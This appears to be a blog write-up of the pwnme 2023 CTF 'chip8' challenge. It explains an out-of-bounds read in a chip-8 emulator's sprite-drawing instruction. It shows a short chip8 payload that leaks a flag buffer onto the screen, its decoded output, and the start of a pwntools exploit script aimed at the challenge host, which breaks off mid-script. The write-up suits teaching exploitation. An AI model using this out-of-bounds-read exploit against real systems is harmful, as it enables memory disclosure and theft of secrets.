<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>[pwnme 2023 - pwn] chip8 | repr</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="chip8 Solves: 24  Easy I just found a repo of a chip-8 emulator, it may be vulnerable but I didn’t had enough time to report the vulnerability with a working PoC.You must find a way to get the flag in">
<meta property="og:type" content="article">
<meta property="og:title" content="[pwnme 2023 - pwn] chip8">
<meta property="og:url" content="https://n4sm.github.io/posts/chip8/index.html">
<meta property="og:site_name" content="repr">
<meta property="og:description" content="chip8 Solves: 24  Easy I just found a repo of a chip-8 emulator, it may be vulnerable but I didn’t had enough time to report the vulnerability with a working PoC.You must find a way to get the flag in">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2023-05-07T22:00:00.000Z">
<meta property="article:modified_time" content="2023-09-05T09:45:11.051Z">
<meta property="article:author" content="nasm">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="nasm">
<meta property="article:tag" content="linux">
<meta property="article:tag" content="pwnme">
<meta property="article:tag" content="chip8">
<meta property="article:tag" content="emulator">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="repr" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.0.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/pic/wall.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>repr </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=https://cdn.discordapp.com/attachments/755522926819934349/1135933820852502589/chtholly_nota_seniorious_by_asukaln_dfhx63b-414w-2x.jpg></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">nasm </div>
      <div class="dot"></div>
      <div class="subtitle">pwn / kernel stuff </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com/nasm_re" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/n4sm" title="GitHub"><i class="fa-brands fa-github"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://ret2school.github.io/discord" title="Discord"><i class="fa-brands fa-discord"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Categories</h3>
      <div class="category-box"></div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/posts/hello-world/" title="Hello World" >
            <div class="recent-link-text">
              Hello World
            </div>
          </a>
        
          <a class="recent-link" href="/posts/iwindow/" title="[ImaginaryCTF 2023 - pwn] window-of-opportunity" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] window-of-opportunity
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-chip8" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        [pwnme 2023 - pwn] chip8
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2023-05-07T22:00:00.000Z" itemprop="datePublished">2023-05-07</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/pwn/">pwn</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            1.5k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/chip8/" rel="tag">chip8</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/emulator/" rel="tag">emulator</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/linux/" rel="tag">linux</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nasm/" rel="tag">nasm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwnme/" rel="tag">pwnme</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h2 id="chip8"><a href="#chip8" class="headerlink" title="chip8"></a>chip8</h2><blockquote>
<p>Solves: 24  Easy</p>
<p>I just found a repo of a chip-8 emulator, it may be vulnerable but I didn’t had enough time to report the vulnerability with a working PoC.<br>You must find a way to get the flag in memory on the remote service !</p>
<p>Author: Express#8049</p>
<p>Remote service at : nc 51.254.39.184 1337</p>
</blockquote>
<p>chip8 is a emulator-pwn challenge I did during the <a target="_blank" rel="noopener" href="https://pwnme.fr/">pwnme CTF</a> . You can find the related files <a target="_blank" rel="noopener" href="https://github.com/ret2school/ctf/tree/master/2023/pwnme/pwn/chip8">here</a>.</p>
<h2 id="Code-review"><a href="#Code-review" class="headerlink" title="Code review"></a>Code review</h2><p>This challenge is based on an emulator called <a target="_blank" rel="noopener" href="https://github.com/LakshyAAAgrawal/chip8emu">c8emu</a> that is updated with these lines of code:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line">diff --git a/include/Machine.hpp b/include/Machine.hpp</span><br><span class="line">index af3d0d7..4288e15 100644</span><br><span class="line">--- a/include/Machine.hpp</span><br><span class="line">+++ b/include/Machine.hpp</span><br><span class="line">@@ -17,6 +17,7 @@ class Machine&#123;</span><br><span class="line"> private:</span><br><span class="line"> 	std::vector&lt;uint8_t&gt; registers; // V0-VF</span><br><span class="line"> 	std::vector&lt;uint8_t&gt; memory; // Memory</span><br><span class="line">+	std::vector&lt;uint8_t&gt; flag;</span><br><span class="line"> 	uint16_t I; // Index register</span><br><span class="line"> 	std::vector&lt;uint16_t&gt; stack; // Stack</span><br><span class="line"> 	uint8_t SP; // Stack Pointer</span><br><span class="line">diff --git a/src/Machine.cpp b/src/Machine.cpp</span><br><span class="line">index d34680e..2321296 100644</span><br><span class="line">--- a/src/Machine.cpp</span><br><span class="line">+++ b/src/Machine.cpp</span><br><span class="line">@@ -6,10 +6,13 @@</span><br><span class="line"> #include &lt;chrono&gt;</span><br><span class="line"> #include &lt;thread&gt;</span><br><span class="line"> </span><br><span class="line">+std::string FLAG = &quot;PWNME&#123;THIS_IS_A_SHAREHOLDER_AAAAAAAAAAAAAAAAAA&#125;&quot;;</span><br><span class="line">+</span><br><span class="line"> Machine::Machine()&#123;</span><br><span class="line"> 	registers = std::vector&lt;uint8_t&gt;(16, 0);</span><br><span class="line"> 	stack = std::vector&lt;uint16_t&gt;(32, 0);</span><br><span class="line"> 	memory = std::vector&lt;uint8_t&gt;(4096, 0);</span><br><span class="line">+	flag = std::vector&lt;uint8_t&gt;(128, 0);</span><br><span class="line"> 	PC = 0x200;</span><br><span class="line"> 	last_tick = std::chrono::steady_clock::now();</span><br><span class="line"> 	I = 0;</span><br><span class="line">@@ -134,8 +137,8 @@ void Machine::execute(uint16_t&amp; opcode)&#123;</span><br><span class="line"></span><br><span class="line"> 	if(it != first_match.end()) (it-&gt;second)(opcode);</span><br><span class="line"> 	else &#123;</span><br><span class="line">-		std::cout &lt;&lt; &quot;No match found for opcode &quot; &lt;&lt; std::hex &lt;&lt; (int) opcode &lt;&lt; &quot;\n&quot;;</span><br><span class="line">-		std::cout &lt;&lt; &quot;This could be because this ROM uses SCHIP or another extension which is not yet supported.\n&quot;;</span><br><span class="line">+		//std::cout &lt;&lt; &quot;No match found for opcode &quot; &lt;&lt; std::hex &lt;&lt; (int) opcode &lt;&lt; &quot;\n&quot;;</span><br><span class="line">+		//std::cout &lt;&lt; &quot;This could be because this ROM uses SCHIP or another extension which is not yet supported.\n&quot;;</span><br><span class="line"> 		std::exit(0);</span><br><span class="line"> 	&#125;</span><br><span class="line"> &#125;</span><br><span class="line">@@ -179,12 +182,13 @@ void Machine::print_machine_state()&#123;</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Machine::runLoop()&#123;</span><br><span class="line">+	std::copy(FLAG.begin(), FLAG.end(), flag.begin());</span><br><span class="line"> 	while(true)&#123;</span><br><span class="line"> 		// Update display</span><br><span class="line"> 		if(ge.is_dirty())&#123; // Check if the screen has to be updated</span><br><span class="line"> 			ge.update_display();</span><br><span class="line">-			print_machine_state();</span><br><span class="line">-			std::cout &lt;&lt; &quot;Opcode &quot; &lt;&lt; ((uint16_t) (memory[PC]&lt;&lt;8) | (memory[PC+1])) &lt;&lt; &quot;\n&quot;;</span><br><span class="line">+			//print_machine_state();</span><br><span class="line">+			//std::cout &lt;&lt; &quot;Opcode &quot; &lt;&lt; ((uint16_t) (memory[PC]&lt;&lt;8) | (memory[PC+1])) &lt;&lt; &quot;\n&quot;;</span><br><span class="line"> 		&#125;</span><br><span class="line"> </span><br><span class="line"> 		// Update the keyboard buffer to check for all pressed keys</span><br><span class="line">diff --git a/src/c8emu.cpp b/src/c8emu.cpp</span><br><span class="line">index e65123b..590228e 100644</span><br><span class="line">--- a/src/c8emu.cpp</span><br><span class="line">+++ b/src/c8emu.cpp</span><br><span class="line">@@ -17,6 +17,10 @@ void loadFile(const std::string&amp; filename, std::vector&lt;uint8_t&gt;&amp; prog)&#123;</span><br><span class="line"> int main(int argc, char ** argv)&#123;</span><br><span class="line"> 	Machine machine;</span><br><span class="line"> </span><br><span class="line">+	setbuf(stdin, NULL);</span><br><span class="line">+	setbuf(stdout, NULL);</span><br><span class="line">+	setbuf(stderr, NULL);</span><br><span class="line">+</span><br><span class="line"> 	&#123; // Create block to deallocate the possibly large variable prog</span><br><span class="line"> 		// Load Instructions</span><br><span class="line"> 		std::vector&lt;uint8_t&gt; prog;</span><br></pre></td></tr></table></figure>

<p>As you can see above, the prints that can leak informations about the program execution are removed, and an array named <code>flag</code> (on the heap) is inserted right after the memory mapping of length <code>0x1000</code> (on the heap) of the chip8 program. This way the goal would be to be able to leak the content of <code>flag</code> onto the screen.</p>
<h2 id="few-words-on-chip8-architecture"><a href="#few-words-on-chip8-architecture" class="headerlink" title="few words on chip8 architecture"></a>few words on chip8 architecture</h2><p>To get a quick overview of the chip8 arch, I advice you to read <a target="_blank" rel="noopener" href="http://devernay.free.fr/hacks/chip8/C8TECH10.HTM#0.0">this</a>. Here are the most important informations from the technical reference:</p>
<ul>
<li>Chip-8 is a simple, interpreted, programming language which was first used on some do-it-yourself computer systems in the late 1970s and early 1980s. The COSMAC VIP, DREAM 6800, and ETI 660 computers are a few examples. These computers typically were designed to use a television as a display, had between 1 and 4K of RAM, and used a 16-key hexadecimal keypad for input. The interpreter took up only 512 bytes of memory, and programs, which were entered into the computer in hexadecimal, were even smaller.</li>
<li>Chip-8 has 16 general purpose 8-bit registers, usually referred to as Vx, where x is a hexadecimal digit (0 through F). There is also a 16-bit register called I. This register is generally used to store memory addresses, so only the lowest (rightmost) 12 bits are usually used.</li>
<li>Here are the instruction we need: <ul>
<li><code>Annn</code> - <code>LD I, addr</code>. Set I &#x3D; nnn. The value of register I is set to nnn.</li>
<li><code>6xkk</code> - <code>LD Vx, byte</code>, Set Vx &#x3D; kk. The interpreter puts the value kk into register Vx. </li>
<li><code>Fx1E</code> - <code>ADD I, Vx</code>. Set I &#x3D; I + Vx. The values of I and Vx are added, and the results are stored in I.</li>
<li><code>Dxyn</code> - <code>DRW Vx, Vy, nibble</code>. Display n-byte sprite starting at memory location I at (Vx, Vy), set VF &#x3D; collision. The interpreter reads n bytes from memory, starting at the address stored in I. These bytes are then displayed as sprites on screen at coordinates (Vx, Vy). Sprites are XORed onto the existing screen. If this causes any pixels to be erased, VF is set to 1, otherwise it is set to 0. If the sprite is positioned so part of it is outside the coordinates of the display, it wraps around to the opposite side of the screen. See instruction 8xy3 for more information on XOR, and section 2.4, Display, for more information on the Chip-8 screen and sprites.</li>
</ul>
</li>
</ul>
<figure class="highlight plaintext"><figcaption><span>or addr - A 12-bit value, the lowest 12 bits of the instruction</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">n or nibble - A 4-bit value, the lowest 4 bits of the instruction</span><br><span class="line">x - A 4-bit value, the lower 4 bits of the high byte of the instruction</span><br><span class="line">y - A 4-bit value, the upper 4 bits of the low byte of the instruction</span><br><span class="line">kk or byte - An 8-bit value, the lowest 8 bits of the instruction </span><br></pre></td></tr></table></figure>

<h2 id="The-bug"><a href="#The-bug" class="headerlink" title="The bug"></a>The bug</h2><p>The bug lies into the implementation around the instruction that use the <code>I</code> register. Indeed, as you read above, the <code>I</code> register is 16 bits wide. Thus we could we print onto the screen with the help of the <code>DRW</code> instruction data stored from <code>memory[I=0]</code> up to <code>memory[I=2^16 - 1]</code>. Let’s see how does it  handle the <code>DRW</code> instruction:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://github.com/LakshyAAAgrawal/chip8emu/blob/master/src/Machine.cpp#L123</span></span><br><span class="line"></span><br><span class="line">&#123;<span class="number">0xd000</span>, [this](<span class="type">uint16_t</span>&amp; op)&#123; <span class="comment">// TODO - Dxyn - DRW Vx, Vy, nibble</span></span><br><span class="line">    registers[<span class="number">0xf</span>] = ge.draw_sprite(memory.begin() + I, memory.begin() + I + (op &amp; <span class="number">0x000f</span>), registers[(op &amp; <span class="number">0x0f00</span>)&gt;&gt;<span class="number">8</span>] % <span class="number">0x40</span>, registers[(op &amp; <span class="number">0x00f0</span>)&gt;&gt;<span class="number">4</span>] % <span class="number">0x20</span>);</span><br><span class="line">&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>The first and the second argument are the begin and the end of the location where data to print are stored. <code>(op &amp; 0x000f)</code> represents the amount of bytes we’d like to print. As you can see no checks are performed, this way we able to get a read out of bound from from <code>memory[I=0]</code> up to <code>memory[I=2^16 - 1]</code>.</p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>Now we now how we could exfiltrate the flag we can write this tiny chip8 program:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">code = [</span><br><span class="line">    <span class="number">0xAFFF</span>, <span class="comment"># Annn - LD I, addr, I  = 0xfff</span></span><br><span class="line">    <span class="number">0x6111</span>, <span class="comment"># 6xkk - LD Vx, byte, R1 = 0x11</span></span><br><span class="line">    <span class="number">0xF11E</span>, <span class="comment"># ADD I, R1, I =&gt; 0x1010</span></span><br><span class="line">    <span class="number">0xDBCF</span>  <span class="comment"># Write on screen (xored with current pixels) 15 bytes from I=0x1010</span></span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p>We read the flag from <code>memory[0x1010]</code> given <code>memory</code> is adjacent to the <code>flag</code> (<code>memory[0x1000]</code> &#x3D;&#x3D; begin of the chunk <code>flag</code> within the heap), and we add <code>0x10</code> to read the chunk content which is right after the header (prev_sz and chunk_sz). Once we launch it we get:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">python3 exploit.py REMOTE HOST=51.254.39.184 PORT=1337</span><br><span class="line">[*] &#x27;/media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ret2school/ctf/2023/pwnme/pwn/chip8/wrapper&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">╔════════════════════════════════════════════════════════════════╗</span><br><span class="line">║ █ █ ▄▄▄                                                        ║</span><br><span class="line">║ █  ██▀▄                                                        ║</span><br><span class="line">║ █▄▄▄▀▄█                                                        ║</span><br><span class="line">║ █  ▄ ▀▀                                                        ║</span><br><span class="line">║ ▄██   ▀                                                        ║</span><br><span class="line">║  █▄█▀ ▀                                                        ║</span><br><span class="line">║ ▀▄█▀▀██                                                        ║</span><br><span class="line">║ ▀▀ ▀▀ ▀                                                        ║</span><br></pre></td></tr></table></figure>

<p>If we decode chars by hand (each byte is a line for which white is 1 and black zero), we get:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">╔════════════════════════════════════════════════════════════════╗</span><br><span class="line">║ █ █ ▄▄▄                                                        ║PW</span><br><span class="line">║ █  ██▀▄                                                        ║NM</span><br><span class="line">║ █▄▄▄▀▄█                                                        ║E&#123;</span><br><span class="line">║ █  ▄ ▀▀                                                        ║CH</span><br><span class="line">║ ▄██   ▀                                                        ║18</span><br><span class="line">║  █▄█▀ ▀                                                        ║-8</span><br><span class="line">║ ▀▄█▀▀██                                                        ║_3</span><br><span class="line">║ ▀▀ ▀▀ ▀                                                         m</span><br></pre></td></tr></table></figure>

<p>If we repeat this step 4 times (by incrementing the value of V1), we finally managed to get the flag: <code>PWNME&#123;CH1p-8_3mu14t0r_1s_h4Ck4bl3_1n_2023_y34h&#125;</code>.</p>
<h2 id="Full-exploit"><a href="#Full-exploit" class="headerlink" title="Full exploit"></a>Full exploit</h2><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># this exploit was generated via</span></span><br><span class="line"><span class="comment"># 1) pwntools</span></span><br><span class="line"><span class="comment"># 2) ctfmate</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> pwn</span><br><span class="line"></span><br><span class="line">BINARY = <span class="string">&quot;wrapper&quot;</span></span><br><span class="line">LIBC = <span class="string">&quot;/usr/lib/x86_64-linux-gnu/libc.so.6&quot;</span></span><br><span class="line">LD = <span class="string">&quot;/lib64/ld-linux-x86-64.so.2&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Set up pwntools for the correct architecture</span></span><br><span class="line">exe = pwn.context.binary = pwn.ELF(BINARY)</span><br><span class="line">libc = pwn.ELF(LIBC)</span><br><span class="line">ld = pwn.ELF(LD)</span><br><span class="line">pwn.context.terminal = [<span class="string">&quot;tmux&quot;</span>, <span class="string">&quot;splitw&quot;</span>, <span class="string">&quot;-h&quot;</span>]</span><br><span class="line">pwn.context.delete_corefiles = <span class="literal">True</span></span><br><span class="line">pwn.context.rename_corefiles = <span class="literal">False</span></span><br><span class="line">p64 = pwn.p64</span><br><span class="line">u64 = pwn.u64</span><br><span class="line">p32 = pwn.p32</span><br><span class="line">u32 = pwn.u32</span><br><span class="line">p16 = pwn.p16</span><br><span class="line">u16 = pwn.u16</span><br><span class="line">p8  = pwn.p8</span><br><span class="line">u8  = pwn.u8</span><br><span class="line"></span><br><span class="line">host = pwn.args.HOST <span class="keyword">or</span> <span class="string">&#x27;127.0.0.1&#x27;</span></span><br><span class="line">port = <span class="built_in">int</span>(pwn.args.PORT <span class="keyword">or</span> <span class="number">1337</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">local</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Execute the target binary locally&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> pwn.args.GDB:</span><br><span class="line">        <span class="keyword">return</span> pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> pwn.process([exe.path] + argv, *a, **kw)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">remote</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Connect to the process on the remote host&#x27;&#x27;&#x27;</span></span><br><span class="line">    io = pwn.connect(host, port)</span><br><span class="line">    <span class="keyword">if</span> pwn.args.GDB:</span><br><span class="line">        pwn.gdb.attach(io, gdbscript=gdbscript)</span><br><span class="line">    <span class="keyword">return</span> io</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Start the exploit against the target.&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> pwn.args.LOCAL:</span><br><span class="line">        <span class="keyword">return</span> local(argv, *a, **kw)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> remote(argv, *a, **kw)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">gdbscript = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">source ~/Downloads/pwndbg/gdbinit.py</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>.<span class="built_in">format</span>(**<span class="built_in">locals</span>())</span><br><span class="line"></span><br><span class="line">pwn.context.endianness = <span class="string">&#x27;big&#x27;</span></span><br><span class="line"></span><br><span class="line">STEP=<span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exp</span>():</span><br><span class="line">    io = start()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># every registers are zero-ed at the begin of the program</span></span><br><span class="line">    code = [</span><br><span class="line">        <span class="number">0xAFFF</span>, <span class="comment"># Annn - LD I, addr, I  = 